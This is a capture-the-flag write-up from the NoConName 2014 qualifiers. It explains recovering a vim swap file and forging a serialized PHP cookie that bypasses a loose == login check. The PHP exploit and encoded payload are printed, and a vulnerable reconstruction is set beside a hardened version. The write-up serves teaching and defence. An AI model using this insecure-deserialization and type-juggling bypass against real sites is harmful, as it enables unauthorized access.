15 September 2014

NOCONNAME CTF QUALS 2014: MakeMeFeeWet^Hb WRITEUP

Access == Flag
https://ctf.noconname.org/makemefeelweb/



we've got a web form and we know bypassing that form means getting the flag
checking out the page source we see this


it's a comment from vim, so maybe vim was used to develop this script, and there might be some vim backup files lying around
the form is being submitted to login.php
the only backup file i found was .login.php.swp
after downloading it and running strings on it

 st3phn@x0 ~/test $ strings login.php.swp  
 b0VIM 7.4  
 /ncn/web1/login.php  
 3210#"!   
           @$data = unserialize(hex2bin(implode(explode("\\x", base64_decode($cookie)))));  
      if (isset($_COOKIE['JSESSIONID'])) {  
           if ($username == "p00p" && $password == "l!k34b4u5") {  
                $this->p = $_passwd;  
                $this->u = $_uname;  
           public function __construct($_uname, $_passwd) {  
           public $p;  
           public $u;  
      class Creds {  


it's incomplete but it seems like enough code to do the job
there's an obvious username and password; i tried them and got trolled
going further, there's a check for a cookie called JSESSIONID:
GET /makemefeelweb/login.php with COOKIE: JSESSIONID=whatever; and we get a message saying we're on the right track
so let's go further,
the cookie goes through unserialize, which is known for the possibility of instantiating arbitrary objects from client-controlled data
after a few attempts i recreated the Creds class with $u=true and $p=true, assuming the credentials are checked with a loose == comparison (in PHP, true == "p00p" is true because the non-empty string is converted to boolean true), and it worked!
so

  <?php
  // same property names as the recovered class, both set to true; the encoding mirrors the decode chain seen in the swap file
  class Creds { public $p = true; public $u = true; }
  $a = new Creds;
  echo base64_encode(bin2hex(serialize($a)));

Output :
NGYzYTM1M2EyMjQzNzI2NTY0NzMyMjNhMzIzYTdiNzMzYTMxM2EyMjcwMjIzYjYyM2EzMTNiNzMzYTMxM2EyMjc1MjIzYjYyM2EzMTNiN2Q=

sending the output of this lil php chizzle to login.php in the JSESSIONID cookie
bingo! we got the flag!
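added example, not the challenge's own code: a reconstruction of the login check implied by the swap-file fragments next to a hardened version that never unserializes the cookie, so the forged cookie from this writeup is accepted by the first and rejected by the second. the credentials and cookie format come from the swap file; the function names, the JSON cookie layout and PHP 7+ are assumptions.

```php
<?php
// Reconstructed from the recovered .swp fragments (Creds class, expected
// credentials, decode chain); the surrounding functions are hypothetical.
class Creds {
    public $p;
    public $u;
    public function __construct($_uname, $_passwd) {
        $this->u = $_uname;
        $this->p = $_passwd;
    }
}

// Vulnerable pattern: unserialize() lets the client choose the property
// types, and a loose == treats boolean true as equal to any non-empty string.
function vulnerableCheck(string $cookie): bool {
    $data = unserialize(hex2bin(implode(explode("\\x", base64_decode($cookie)))));
    return $data->u == "p00p" && $data->p == "l!k34b4u5";
}

// Hardened pattern (assumed cookie layout: base64 of a JSON object):
// no unserialize() on untrusted input, explicit string type checks, and a
// strict constant-time comparison via hash_equals().
function hardenedCheck(string $cookie): bool {
    $data = json_decode(base64_decode($cookie, true) ?: '', true);
    if (!is_array($data) || !is_string($data['u'] ?? null) || !is_string($data['p'] ?? null)) {
        return false;
    }
    return hash_equals("p00p", $data['u']) && hash_equals("l!k34b4u5", $data['p']);
}

// The forged cookie from the writeup: both fields are boolean true, built
// with the exact inverse of the decode chain above.
$forged = base64_encode(bin2hex(serialize(new Creds(true, true))));

// Constructed JSON cookies for the hardened check: one with the same
// boolean trick, one with real string credentials.
$jsonBool = base64_encode('{"u":true,"p":true}');
$jsonReal = base64_encode('{"u":"p00p","p":"l!k34b4u5"}');

var_dump(vulnerableCheck($forged));   // loose == on an unserialized object
var_dump(true == "p00p");             // the comparison that makes the bypass work
var_dump(hardenedCheck($forged));     // not JSON, so rejected before any comparison
var_dump(hardenedCheck($jsonBool));   // booleans fail the is_string check
var_dump(hardenedCheck($jsonReal));   // only the real string credentials pass
```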


NcN_778064be6556e64577517875a8710b0abeba1578



